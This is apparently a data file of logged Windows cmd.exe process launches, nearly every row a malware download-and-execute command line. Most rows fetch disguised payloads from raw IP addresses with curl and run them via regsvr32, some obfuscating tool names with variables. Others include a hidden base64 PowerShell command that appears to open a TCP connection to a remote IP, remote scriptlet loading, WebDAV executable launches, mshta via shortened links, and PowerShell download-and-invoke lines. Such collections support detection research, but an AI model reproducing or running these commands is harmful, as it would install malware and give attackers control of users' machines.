"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\aboutButUse.rtf http://202.182.116.198/outAlso.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\aboutButUse.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\butDo.rtf http://146.70.79.52/thinkWhoThing.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\butDo.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\butOutThese.rtf http://146.70.79.52/whatNew.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\butOutThese.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\goAlso.rtf http://146.70.79.52/fromMakeTell.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\goAlso.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\haveThinkAlso.rtf http://185.106.120.104/forFirstAt.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\haveThinkAlso.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\hereHave.rtf http://185.106.120.104/onlyTime.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\hereHave.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\ifWe.rtf http://91.194.11.27/timeA.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\ifWe.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\intoLookSee.rtf http://202.182.116.198/oneWeSay.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\intoLookSee.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\itsThan.rtf http://146.70.79.52/justSomeThese.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\itsThan.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\manDayWe.rtf http://172.96.137.171/lookLikeGet.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\manDayWe.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\moreHe.rtf http://146.70.79.52/whenYouGive.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\moreHe.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\myWhichBy.rtf http://202.182.116.198/knowManSome.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\myWhichBy.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\onEven.rtf http://172.96.137.171/oneButWhen.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\onEven.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\theTellDay.rtf http://185.106.120.104/thenEvenOf.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\theTellDay.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\theirFirstHow.rtf http://91.194.11.27/myLike.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\theirFirstHow.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\thingUpThat.rtf http://185.106.120.104/thoseThink.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\thingUpThat.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\toThere.rtf http://172.96.137.171/evenInto.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\toThere.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\upThen.rtf http://202.182.116.198/tellItsYear.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\upThen.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\veryWayKnow.rtf http://202.182.116.198/hisJustHim.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\veryWayKnow.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\whenMyTwo.rtf http://185.106.120.104/findInto.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\whenMyTwo.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\whoAll.rtf http://202.182.116.198/thisBe.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\whoAll.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\whoNewBecause.rtf http://185.106.120.104/takeThingHow.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\whoNewBecause.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\yearYearOf.rtf http://202.182.116.198/ITellThere.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\yearYearOf.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\youThatAt.rtf http://172.96.137.171/wouldMoreThan.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\youThatAt.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\yourLikeShe.rtf http://91.194.11.27/upForMe.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\yourLikeShe.rtf","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c PowerShell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAyADMALgAyADAALgAzADMALgA0ADEAIgAsADcAOQA3ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJ","C:\Windows\system32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c call C:\Windows\system32\curl -s -o C:\Users\user\AppData\Roaming\oneWhich.png consumerfinancereport.local/blog/index/whichABy.jpg && ping -n 1 127.0.0.1 > nul && C:\Windows\system32\regsvr32 C:\Users\user\AppData\Roaming\OneWhich.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c call C:\Windows\system32\curl -s -o C:\Users\user\AppData\Roaming\oneWhich.png consumerfinancereport.local/blog/index/whichABy.jpg && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && C:\Windows\system32\regsvr32 C:\Users\user\AppData\Roaming\OneWhich.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c cd C:\Users\Public\Downloads & curl -o aclient.exe http://95.214.24.180/aclient.exe & start /min aclient.exe","C:\Users\Public\Downloads\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c cmd < info.txt","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c copy login.lnk C:\Users\user\AppData\Local\Temp\lola.tmp & findstr /b ""lol"" C:\Users\user\AppData\Local\Temp\lola.tmp > C:\Users\user\AppData\Local\Temp\resultat.vbs & ""C:\Users\user\AppData\Local\Temp\resultat.vbs""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -O http://137.184.188.240:2000/Ac.exe&& start Ac.exe&& exit","C:\Users\user\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\10234.jpg http://23.29.125.210/meWith.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\10234.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\12348.jpg http://94.140.112.30/useHimBut.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\12348.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\14423.jpg http://23.29.125.210/otherThat.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\14423.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\17030.jpg http://38.132.122.245/forCan.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\17030.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\18215.jpg http://80.92.205.91/lookByYour.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\18215.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\20134.jpg http://80.92.205.91/manyWhenPeople.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\20134.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\20820.jpg http://217.195.153.111/soItTake.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\20820.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\22605.jpg http://80.92.205.91/giveFrom.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\22605.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\22679.jpg http://94.140.112.30/aNowAt.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\22679.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\22697.jpg http://94.140.112.30/itsThanWith.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\22697.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\24854.jpg http://66.70.218.48/twoUse.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\24854.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\28021.jpg http://213.109.192.61/onlyTheseOne.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\28021.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\28479.jpg http://94.140.112.30/wouldOne.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\28479.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\30821.jpg http://80.92.205.91/noIn.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\30821.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\33494.jpg http://38.132.122.245/otherAtWhich.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\33494.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\33807.jpg http://217.195.153.111/himAnd.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\33807.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\41258.jpg http://103.195.103.140/twoOtherThen.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\41258.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\45146.jpg http://94.140.112.30/alsoHowYear.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\45146.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\45894.jpg http://94.140.112.30/byWillThen.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\45894.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\47270.jpg http://213.109.192.61/knowLike.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\47270.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\48544.jpg http://213.109.192.61/wayDo.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\48544.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\53706.jpg http://213.109.192.61/doAWho.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\53706.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\5529.jpg http://217.195.153.111/ourHereSay.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\5529.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\55786.jpg http://23.29.125.210/willGive.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\55786.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\5587.jpg http://217.195.153.111/heWell.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\5587.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\58084.jpg http://38.132.122.245/useHow.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\58084.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\58533.jpg http://23.29.125.210/fromCould.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\58533.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\7668.jpg http://80.92.205.91/canFirstWhat.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\7668.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c echo %random% &StArT DISK_DRIVER.vbe &echo %random% &StArT Plantilla"" ""factura"" ""para"" ""rellenar.xlsx &echo %random% &exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c echo %random% &StArT tmp4B.tmpUSB_DRIVER_WINDOWS.vbe &echo %random% &StArT 22-049565.pdf &echo %random% &exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c net use http://159.65.198.79 && start /b \\159.65.198.79\DavWWWRoot\debitorskayazadolgennost.docx & start /b \\159.65.198.79\DavWWWRoot\og.exe node.exe gr","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c net use http://45.32.147.46 && start /b \\45.32.147.46\DavWWWRoot\aktsverkidiadok.docx & start /b \\45.32.147.46\DavWWWRoot\ph.exe node.exe def","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c powershell.exe -c ""iex(New-Object Net.WebClient).DownloadString('https://pst.klgrth.io/paste/pe6yx/raw')""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c powershell.exe -exec bypass -nop -w hidden iwr -outf C:\Users\user\AppData\Local\Temp\\quotation.docx https://www.autodontreplyservices.com/v1/quotation.docx & regsvr32 /s /n /u /i:http://ec2-54-91-111-47.compute-1.amazonaws.com:4455/adsense/troubleshooter/1631343/_rg scrobj.dll & C:\Users\user\AppData\Local\Temp\\quotation.docx","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c powershell.exe -nop -w hidden -ExecutionPolicy Bypasss -noLogo iwr -Uri https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -OutFile $env:TEMP\test.exe; start $env:TEMP\test.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c powershell.exe -nop -w hidden iwr -outf C:\Users\user\AppData\Local\Temp\loader.exe https://thinkforce.com.br/vsBuildTools & C:\Users\user\AppData\Local\Temp\loader.exe","C:\Windows\System32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c powershell.exe Invoke-WebRequest -Uri ""http://www.costco.com"" -OutFile ""file"" && cmd /c powershell Start-Process -FilePath ""file""","C:\Users\user\AppData\Roaming\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c powershell.exe Invoke-WebRequest -Uri ""http://www.costco.com"" -OutFile ""file"" && cmd /c ""file""","C:\Users\user\AppData\Roaming\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\beWill.png http://94.140.112.31/ofNot.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\beWill.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\comeMake.png http://45.155.37.118/howMoreUp.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\comeMake.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\herSomeOne.png http://147.135.120.134/thereThan.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\herSomeOne.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\hisOutYou.png http://147.135.120.134/ofIntoAt.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\hisOutYou.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\likeAndAlso.png http://212.46.38.118/orDo.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\likeAndAlso.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\lookGive.png http://45.155.37.118/knowWe.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\lookGive.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\newDayMan.png http://94.140.112.31/goLikeIn.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\newDayMan.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\oneOn.png http://45.155.37.118/tellWhenHe.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\oneOn.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\thereNowVery.png http://216.238.109.24/oneMake.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\thereNowVery.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\withVeryTime.png http://216.238.109.24/thenDo.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\withVeryTime.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\becauseKnow.png http://147.135.120.177/otherOnly.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\becauseKnow.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\getFind.png http://45.133.216.76/dayThinkIn.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\getFind.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\heIfAnd.png http://85.239.55.212/whatTheirAnd.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\heIfAnd.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\knowAbout.png http://85.239.55.212/heHowMake.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\knowAbout.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\likeAIn.png http://147.135.120.177/tellSeeThis.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\likeAIn.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\manyACome.png http://94.140.112.5/theyOne.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\manyACome.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\meOn.png http://85.239.55.212/notFirst.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\meOn.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\soMe.png http://85.239.55.212/willTheirFirst.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\soMe.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regsv&& set cu=cur&&call C:\Windows\system32\%cu%l -s -o C:\Users\user\AppData\Local\Temp\takeIt.png http://94.140.114.147/theseYour.jpg&&call C:\Windows\system32\%r1%r32 C:\Users\user\AppData\Local\Temp\takeIt.png","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start /min https://bit.ly/3anaDLz && m^s^hta ""https://bit.ly/3z02gPL""","C:\WINDOWS\system32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start /min powershell $r=Invoke-WebRequest -Uri http://www.0c020.com/k.php;cmd /c $r","C:\Windows\system32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start docum.bat","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start documents.bat","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start rundll32.exe am1lo4.dll,#1","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start rundll32.exe nu3a4al.dll, PluginInit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start rundll32.exe o5p0se.dll, #1","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start rundll32.exe pg5rto.dll,#1","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /dGqnRo/V/CTyPe CoBQ.log|cMD","C:\Users\user\Desktop\",1
